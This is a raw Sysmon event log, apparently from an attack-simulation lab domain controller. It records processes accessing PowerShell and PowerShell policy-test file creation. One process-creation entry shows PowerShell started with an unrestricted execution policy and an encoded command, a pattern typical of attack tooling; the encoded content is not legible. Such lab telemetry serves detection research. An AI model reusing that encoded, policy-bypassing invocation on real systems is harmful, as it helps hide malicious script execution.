C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.528{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rmqrj54k.xrf.ps12021-01-18 13:33:19.528 10341000x8000000000000000371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.513{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.481{59A5CD1D-8E1F-6005-CD02-00000000A201}888168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95c9331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+950f4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95152edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f6795
8bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951363d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95128356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95134889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9513447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511a2a7(wow64) 154100x8000000000000000358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.489{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.434{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.434{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.388{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_egkus23s.wed.ps12021-01-18 13:33:19.388 10341000x8000000000000000354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.388{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.388{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.388{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.388{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
